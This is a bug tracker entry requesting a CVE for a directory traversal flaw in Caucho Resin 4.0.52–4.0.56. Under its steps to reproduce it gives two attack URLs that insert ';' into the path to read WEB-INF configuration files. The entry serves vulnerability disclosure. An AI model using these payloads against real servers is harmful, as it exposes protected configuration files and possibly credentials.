Mantis Bugtracker
  

Viewing Issue Advanced Details Jump to Notes ] View Simple ] Issue History ] Print ]
ID Category Severity Reproducibility Date Submitted Last Update
0006448 [Resin] major always 11-21-21 02:23 08-29-23 19:52
Reporter liulangmao View Status public  
Assigned To
Priority normal Resolution open Platform
Status new   OS
Projection none   OS Version
ETA none Fixed in Version Product Version
  Product Build
Summary 0006448: CVE ID Request
Description Directory traversal vulnerability in Caucho Resin, as distributed in Resin V4.0.52~4.0.56, allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.
Steps To Reproduce > [Attack Vectors]
> http://localhost/resin-doc/;/WEB-INF/resin-web.xml [^] or http://localhost/webapp-name/;/WEB-INF/web.xml [^]
Additional Information
Attached Files  1b4438dfb8f690cb7eadcd0d0d085816.png [^] (190,723 bytes) 11-21-21 02:23

- Relationships

There are no notes attached to this issue.

- Issue History
Date Modified Username Field Change
11-21-21 02:23 liulangmao New Issue
11-21-21 02:23 liulangmao File Added: 1b4438dfb8f690cb7eadcd0d0d085816.png
11-21-21 02:27 liulangmao Issue Monitored: liulangmao
01-26-22 11:04 knut_forkalsrud Issue Monitored: knut_forkalsrud
08-15-23 21:31 sorrowfullover Note Added: 0007231
08-29-23 19:52 betterwou Note Added: 0007244
11-14-23 17:44 ferg Note Deleted: 0007231
11-14-23 17:44 ferg Note Deleted: 0007244


Mantis 1.0.0rc3[^]
Copyright © 2000 - 2005 Mantis Group
37 total queries executed.
28 unique queries executed.
Powered by Mantis Bugtracker